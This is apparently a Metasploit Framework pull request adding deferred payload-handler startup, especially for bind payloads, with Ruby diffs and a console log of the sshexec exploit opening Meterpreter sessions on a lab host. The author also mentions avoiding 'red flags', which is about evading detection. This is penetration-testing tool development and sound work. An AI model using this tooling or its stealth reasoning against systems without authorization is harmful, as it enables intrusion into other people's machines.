### PR TITLE
Implement first pass at deferred payload handling

### DIFF
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -330,17 +330,14 @@ class Exploit < Msf::Module
         ], Msf::Exploit)
     end
 
-    # Allow all exploits to leverage context keyed encoding
     register_advanced_options(
       [
+        # Allow all exploits to leverage context keyed encoding
         OptBool.new('EnableContextEncoding', [ false, "Use transient context when encoding payloads", false ]),
-        OptPath.new('ContextInformationFile', [ false, "The information file that contains context information", nil ])
-      ], Msf::Exploit)
-
-    # Allow all exploits to disable their payload handlers
-    register_advanced_options(
-      [
-        OptBool.new('DisablePayloadHandler', [ false, "Disable the handler code for the selected payload", false ])
+        OptPath.new('ContextInformationFile', [ false, "The information file that contains context information", nil ]),
+        # Allow all exploits to disable or defer starting their payload handlers
+        OptBool.new('DisablePayloadHandler', [ false, "Disable the handler code for the selected payload", false ]),
+        OptBool.new('DeferPayloadHandler', [ false, "Defer the handler code until the exploit is complete", false ])
       ], Msf::Exploit)
   end
 
@@ -434,6 +431,8 @@ class Exploit < Msf::Module
     payload_instance.exploit_config = {
       'active_timeout' => self.active_timeout
     }
+
+    return if handler_deferred?
 
     # Set up the payload handlers
     payload_instance.setup_handler
@@ -1240,7 +1239,14 @@ class Exploit < Msf::Module
   # Allow the user to disable the payload handler
   #
   def handler_enabled?
-    not datastore['DisablePayloadHandler']
+    !datastore['DisablePayloadHandler']
+  end
+
+  #
+  # Allow the user to defer starting the payload handler
+  #
+  def handler_deferred?
+    datastore['DeferPayloadHandler']
   end
 
   ##

--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -335,9 +335,8 @@ class Exploit < Msf::Module
         # Allow all exploits to leverage context keyed encoding
         OptBool.new('EnableContextEncoding', [ false, "Use transient context when encoding payloads", false ]),
         OptPath.new('ContextInformationFile', [ false, "The information file that contains context information", nil ]),
-        # Allow all exploits to disable or defer starting their payload handlers
-        OptBool.new('DisablePayloadHandler', [ false, "Disable the handler code for the selected payload", false ]),
-        OptBool.new('DeferPayloadHandler', [ false, "Defer the handler code until the exploit is complete", false ])
+        # Allow all exploits to disable their payload handlers
+        OptBool.new('DisablePayloadHandler', [ false, "Disable the handler code for the selected payload", false ])
       ], Msf::Exploit)
   end
 
@@ -432,14 +431,14 @@ class Exploit < Msf::Module
       'active_timeout' => self.active_timeout
     }
 
-    return if handler_deferred?
-
     # Set up the payload handlers
     payload_instance.setup_handler
 
+    # Defer starting bind handlers until after exploit completion
+    return if handler_bind?
+
     # Start the payload handler
     payload_instance.start_handler
-
   end
 
   #
@@ -1243,10 +1242,10 @@ class Exploit < Msf::Module
   end
 
   #
-  # Allow the user to defer starting the payload handler
+  # If the payload uses a bind handler
   #
-  def handler_deferred?
-    datastore['DeferPayloadHandler']
+  def handler_bind?
+    payload_instance && payload_instance.connection_type == 'bind'
   end
 
   ##
@@ -1290,6 +1289,9 @@ class Exploit < Msf::Module
   # A boolean for whether a session has been created yet
   #
   def session_created?
+    # Start bind handlers before checking session creation
+    payload_instance.start_handler if handler_bind?
+
     (self.session_count > 0) ? true : false
   end
 

--- a/lib/msf/core/exploit_driver.rb
+++ b/lib/msf/core/exploit_driver.rb
@@ -214,6 +214,11 @@ protected
       exploit.handle_exception e
     end
 
+    if exploit.handler_deferred?
+      payload.setup_handler
+      payload.start_handler
+    end
+
     # Wait the payload to acquire a session if this isn't a passive-style
     # exploit.
     return if not delay

--- a/lib/msf/core/exploit_driver.rb
+++ b/lib/msf/core/exploit_driver.rb
@@ -214,15 +214,12 @@ protected
       exploit.handle_exception e
     end
 
-    if exploit.handler_deferred?
-      payload.setup_handler
-      payload.start_handler
-    end
+    # Start bind handlers after exploit completion
+    payload.start_handler if exploit.handler_bind?
 
     # Wait the payload to acquire a session if this isn't a passive-style
     # exploit.
     return if not delay
-
 
     if (force_wait_for_session == true) or
       (exploit.passive? == false and exploit.handler_enabled?)

--- a/lib/msf/core/handler/bind_named_pipe.rb
+++ b/lib/msf/core/handler/bind_named_pipe.rb
@@ -285,6 +285,7 @@ module Msf
           print_status("Started #{human_name} handler against #{rhost}:#{lport}")
 
           # First, create a socket and connect to the SMB service
+          vprint_status("Connecting to #{rhost}:#{lport}")
           begin
             sock = Rex::Socket::Tcp.create(
               'PeerHost' => rhost,


### PR DESCRIPTION
This is most useful for bind payloads, and I initially did just that, but I've migrated the code to be more generic.

We will need to decide if we should limit this to bind payloads. It's not a difficult change to make.

```
msf5 exploit(multi/ssh/sshexec) > run

[*] Started bind TCP handler against 172.28.128.4:4444
[*] 172.28.128.4:22 - Sending stager...
[*] Command Stager progress -  40.67% done (314/772 bytes)
[*] Sending stage (816260 bytes) to 172.28.128.4
[*] Meterpreter session 1 opened (172.28.128.3:35433 -> 172.28.128.4:4444) at 2018-07-06 14:14:35 -0500
[-] SSH Timeout Exception will say the Exploit Failed; do not believe it.
[+] You will likely still get a shell; run sessions -l to be sure.
[*] Command Stager progress - 100.00% done (772/772 bytes)
[-] Exploit failed: IOError closed stream
[*] Exploit completed, but no session was created.
msf5 exploit(multi/ssh/sshexec) > sessions -K
[*] Killing all sessions...
[*] 172.28.128.4 - Meterpreter session 1 closed.
msf5 exploit(multi/ssh/sshexec) > set deferpayloadhandler true
deferpayloadhandler => true
msf5 exploit(multi/ssh/sshexec) > run

[*] 172.28.128.4:22 - Sending stager...
[*] Command Stager progress -  40.67% done (314/772 bytes)
[-] SSH Timeout Exception will say the Exploit Failed; do not believe it.
[+] You will likely still get a shell; run sessions -l to be sure.
[*] Command Stager progress - 100.00% done (772/772 bytes)
[*] Started bind TCP handler against 172.28.128.4:4444
[*] Sending stage (816260 bytes) to 172.28.128.4
[*] Meterpreter session 2 opened (172.28.128.3:39103 -> 172.28.128.4:4444) at 2018-07-06 14:14:58 -0500

meterpreter >
```

It's not evident in the log, but bind handlers start connecting as soon as an exploit is run. Obviously that's inefficient and potentially raises red flags.